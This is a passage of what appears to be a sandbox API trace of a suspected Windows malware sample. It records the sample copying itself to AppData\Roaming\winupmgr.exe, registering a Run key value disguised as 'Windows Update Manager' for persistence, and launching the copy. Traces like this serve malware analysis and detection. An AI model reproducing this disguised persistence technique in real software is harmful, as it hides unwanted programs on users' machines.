lpProcName="VariantClear") returned 0x76e43eae [0100.817] GetProcAddress (hModule=0x76e40000, lpProcName="VariantInit") returned 0x76e43ed5 [0100.817] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76e40000 [0100.817] GetProcAddress (hModule=0x76e40000, lpProcName="SysFreeString") returned 0x76e43e59 [0100.817] GetProcAddress (hModule=0x76e40000, lpProcName="SysReAllocStringLen") returned 0x76e47810 [0100.817] GetProcAddress (hModule=0x76e40000, lpProcName="SysAllocStringLen") returned 0x76e445d2 [0100.817] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x759d0000 [0100.817] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0100.817] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77130000 [0100.817] GetProcAddress (hModule=0x77130000, lpProcName="SetClipboardData") returned 0x77188e57 [0100.817] GetProcAddress (hModule=0x77130000, lpProcName="ReleaseDC") returned 0x77147446 [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="OpenClipboard") returned 0x77158ecb [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="LoadStringA") returned 0x7714db21 [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="LoadIconA") returned 0x7714dafb [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="GetSystemMetrics") returned 0x77147d2f [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColor") returned 0x77146c3c [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="GetOpenClipboardWindow") returned 0x7715c468 [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="GetDC") returned 0x771472c4 [0100.818] GetProcAddress (hModule=0x77130000, lpProcName="GetClipboardData") returned 0x77189f1d [0100.819] GetProcAddress (hModule=0x77130000, lpProcName="EmptyClipboard") returned 0x771a7cb9 [0100.819] GetProcAddress (hModule=0x77130000, lpProcName="CloseClipboard") returned 0x77158e8d [0100.819] GetProcAddress (hModule=0x77130000, lpProcName="CharNextA") returned 0x77147a1b [0100.819] GetProcAddress (hModule=0x77130000, lpProcName="CharUpperBuffA") returned 0x7714fe47 [0100.819] GetProcAddress (hModule=0x77130000, lpProcName="CharToOemA") returned 0x77154fee [0100.819] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77130000 [0100.819] GetProcAddress (hModule=0x77130000, lpProcName="GetKeyboardType") returned 0x77189ac4 [0100.820] GetProcAddress (hModule=0x77130000, lpProcName="LoadStringA") returned 0x7714db21 [0100.820] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0100.820] GetProcAddress (hModule=0x77130000, lpProcName="CharNextA") returned 0x77147a1b [0100.820] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0100.820] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0100.821] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0100.821] GetKeyboardType (nTypeFlag=0) returned 4 [0100.821] GetCommandLineA () returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe" [0100.821] GetStartupInfoA (in: lpStartupInfo=0x18fef4 | out: lpStartupInfo=0x18fef4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0100.821] GetVersion () returned 0x1db10106 [0100.821] GetVersion () returned 0x1db10106 [0100.821] GetCurrentThreadId () returned 0x5e4 [0100.821] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9f0, nSize=0x105 | out: lpFilename="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\$tmp$001.exe")) returned 0x31 [0100.821] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f8cb, nSize=0x105 | out: lpFilename="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\$tmp$001.exe")) returned 0x31 [0100.821] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e0 | out: phkResult=0x18f9e0*=0x0) returned 0x2 [0100.821] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e0 | out: phkResult=0x18f9e0*=0x0) returned 0x2 [0100.822] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18f9e0 | out: phkResult=0x18f9e0*=0x0) returned 0x2 [0100.822] lstrcpynA (in: lpString1=0x18f8cb, lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe", iMaxLength=261 | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe" [0100.822] GetThreadLocale () returned 0x409 [0100.822] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18f9db, cchData=5 | out: lpLCData="ENU") returned 4 [0100.823] lstrlenA (lpString="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe") returned 49 [0100.823] lstrcpynA (in: lpString1=0x18f8f9, lpString2="ENU", iMaxLength=215 | out: lpString1="ENU") returned="ENU" [0100.823] LoadLibraryExA (lpLibFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0100.824] lstrcpynA (in: lpString1=0x18f8f9, lpString2="EN", iMaxLength=215 | out: lpString1="EN") returned="EN" [0100.824] LoadLibraryExA (lpLibFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0100.824] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c [0100.824] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x545508 [0100.825] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x430000 [0100.825] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x546508 [0100.825] VirtualAlloc (lpAddress=0x430000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x430000 [0100.825] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17 [0100.825] LoadStringA (in: hInstance=0x400000, uID=0xffdb, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15 [0100.825] LoadStringA (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffef, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffd7, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffee, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffeb, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13 [0100.826] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10 [0100.827] LoadStringA (in: hInstance=0x400000, uID=0xfff2, lpBuffer=0x18fb14, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe [0100.827] LoadStringA (in: hInstance=0x400000, uID=0xfff0, lpBuffer=0x18fb00, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd [0100.827] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18fb00, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0100.827] GetVersionExA (in: lpVersionInformation=0x18fe98*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x18ff44, dwMinorVersion=0x77cb1ecd, dwBuildNumber=0x10c3b2, dwPlatformId=0xfffffffe, szCSDVersion="vkÇw'\x0fÔv\x18\x03áv0PT") | out: lpVersionInformation=0x18fe98*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0100.827] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0100.827] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExA") returned 0x76dc434f [0100.827] GetThreadLocale () returned 0x409 [0100.827] GetThreadLocale () returned 0x409 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Jan") returned 4 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x18fd70, cchData=256 | out: lpLCData="January") returned 8 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Feb") returned 4 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x18fd70, cchData=256 | out: lpLCData="February") returned 9 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Mar") returned 4 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x18fd70, cchData=256 | out: lpLCData="March") returned 6 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Apr") returned 4 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x18fd70, cchData=256 | out: lpLCData="April") returned 6 [0100.827] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x18fd70, cchData=256 | out: lpLCData="May") returned 4 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x18fd70, cchData=256 | out: lpLCData="May") returned 4 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Jun") returned 4 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x18fd70, cchData=256 | out: lpLCData="June") returned 5 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Jul") returned 4 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x18fd70, cchData=256 | out: lpLCData="July") returned 5 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Aug") returned 4 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd70, cchData=256 | out: lpLCData="August") returned 7 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Sep") returned 4 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd70, cchData=256 | out: lpLCData="September") returned 10 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Oct") returned 4 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd70, cchData=256 | out: lpLCData="October") returned 8 [0100.828] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Nov") returned 4 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd70, cchData=256 | out: lpLCData="November") returned 9 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Dec") returned 4 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd70, cchData=256 | out: lpLCData="December") returned 9 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Sun") returned 4 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Sunday") returned 7 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Mon") returned 4 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Monday") returned 7 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Tue") returned 4 [0100.831] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Tuesday") returned 8 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Wed") returned 4 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Wednesday") returned 10 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Thu") returned 4 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Thursday") returned 9 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Fri") returned 4 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Friday") returned 7 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Sat") returned 4 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd70, cchData=256 | out: lpLCData="Saturday") returned 9 [0100.832] GetThreadLocale () returned 0x409 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="$") returned 2 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fec4, cchData=2 | out: lpLCData=",") returned 2 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fec4, cchData=2 | out: lpLCData=".") returned 2 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="2") returned 2 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fec4, cchData=2 | out: lpLCData="/") returned 2 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0100.832] GetThreadLocale () returned 0x409 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd98, cchData=256 | out: lpLCData="1") returned 2 [0100.832] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0100.832] GetThreadLocale () returned 0x409 [0100.833] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd98, cchData=256 | out: lpLCData="1") returned 2 [0100.833] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fec4, cchData=2 | out: lpLCData=":") returned 2 [0100.833] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="AM") returned 3 [0100.833] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="PM") returned 3 [0100.833] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0100.833] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0100.833] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdcc, cchData=256 | out: lpLCData="0") returned 2 [0100.833] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fec4, cchData=2 | out: lpLCData=",") returned 2 [0100.833] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76e40000 [0100.833] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeTypeEx") returned 0x76e44c28 [0100.833] GetProcAddress (hModule=0x76e40000, lpProcName="VarNeg") returned 0x76ebc802 [0100.834] GetProcAddress (hModule=0x76e40000, lpProcName="VarNot") returned 0x76ebec66 [0100.834] GetProcAddress (hModule=0x76e40000, lpProcName="VarAdd") returned 0x76e65934 [0100.834] GetProcAddress (hModule=0x76e40000, lpProcName="VarSub") returned 0x76ebd332 [0100.834] GetProcAddress (hModule=0x76e40000, lpProcName="VarMul") returned 0x76ebdbd4 [0100.834] GetProcAddress (hModule=0x76e40000, lpProcName="VarDiv") returned 0x76ebe405 [0100.834] GetProcAddress (hModule=0x76e40000, lpProcName="VarIdiv") returned 0x76ebf00a [0100.834] GetProcAddress (hModule=0x76e40000, lpProcName="VarMod") returned 0x76ebf15e [0100.835] GetProcAddress (hModule=0x76e40000, lpProcName="VarAnd") returned 0x76e65a98 [0100.835] GetProcAddress (hModule=0x76e40000, lpProcName="VarOr") returned 0x76ebecfa [0100.835] GetProcAddress (hModule=0x76e40000, lpProcName="VarXor") returned 0x76ebee2e [0100.835] GetProcAddress (hModule=0x76e40000, lpProcName="VarCmp") returned 0x76e5b0dc [0100.835] GetProcAddress (hModule=0x76e40000, lpProcName="VarI4FromStr") returned 0x76e56fab [0100.835] GetProcAddress (hModule=0x76e40000, lpProcName="VarR4FromStr") returned 0x76e601a0 [0100.836] GetProcAddress (hModule=0x76e40000, lpProcName="VarR8FromStr") returned 0x76e5699e [0100.836] GetProcAddress (hModule=0x76e40000, lpProcName="VarDateFromStr") returned 0x76e66ba7 [0100.836] GetProcAddress (hModule=0x76e40000, lpProcName="VarCyFromStr") returned 0x76e86c12 [0100.836] GetProcAddress (hModule=0x76e40000, lpProcName="VarBoolFromStr") returned 0x76e5dbd1 [0100.836] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromCy") returned 0x76e67fdc [0100.836] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromDate") returned 0x76e57a2a [0100.836] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromBool") returned 0x76e60355 [0100.836] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x94 [0100.837] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x98 [0100.837] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9c [0100.837] GetDC (hWnd=0x0) returned 0x4010a8b [0100.837] GetDeviceCaps (hdc=0x4010a8b, index=90) returned 96 [0100.837] ReleaseDC (hWnd=0x0, hDC=0x4010a8b) returned 1 [0100.837] GetDC (hWnd=0x0) returned 0x4010a8b [0100.837] GetDeviceCaps (hdc=0x4010a8b, index=104) returned 0 [0100.838] ReleaseDC (hWnd=0x0, hDC=0x4010a8b) returned 1 [0100.838] CreatePalette (plpal=0x18fb28) returned 0x390809e5 [0100.838] GetStockObject (i=7) returned 0x1b00017 [0100.838] GetStockObject (i=5) returned 0x1900015 [0100.838] GetStockObject (i=13) returned 0x18a002e [0100.838] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0100.838] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0100.839] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x2e [0100.839] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x430ba4, nSize=0x2e | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0100.839] FindFirstFileA (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe", lpFindFileData=0x18fde8 | out: lpFindFileData=0x18fde8*(dwFileAttributes=0x546b50, ftCreationTime.dwLowDateTime=0x18fedc, ftCreationTime.dwHighDateTime=0x77c7389e, ftLastAccessTime.dwLowDateTime=0x530138, ftLastAccessTime.dwHighDateTime=0x77c7387a, ftLastWriteTime.dwLowDateTime=0x77cef46e, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x530000, nFileSizeLow=0x546b58, dwReserved0=0x5300c4, dwReserved1=0x5374e8, cFileName="ðPT", cAlternateFileName="\x15&@")) returned 0xffffffff [0100.839] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18fe24, nSize=0x105 | out: lpFilename="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\$tmp$001.exe")) returned 0x31 [0100.839] CopyFileA (lpExistingFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\$tmp$001.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\winupmgr.exe"), bFailIfExists=1) returned 1 [0100.849] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x18fefc, lpdwDisposition=0x18ff00 | out: phkResult=0x18fefc*=0xa4, lpdwDisposition=0x18ff00*=0x2) returned 0x0 [0100.849] RegSetValueExA (in: hKey=0xa4, lpValueName="Windows Update Manager", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe", cbData=0x3b | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe") returned 0x0 [0100.849] RegCloseKey (hKey=0xa4) returned 0x0 [0100.971] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0102.057] ExitProcess (uExitCode=0x0) Thread: id = 60 os_tid = 0x15c Thread: id = 61 os_tid = 0x534 Thread: id = 62 os_tid = 0x7d4 Process: id = "18" image_name = "winupmgr.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\winupmgr.exe" page_root = "0x421fc000" os_pid = "0x7ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x5f4" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\winupmgr.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 63 os_tid = 0x7c4 [0103.214] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0103.217] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0103.217] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0103.217] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0103.217] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0103.217] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualQuery") returned 0x76d4445a [0103.217] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0103.217] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0103.218] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 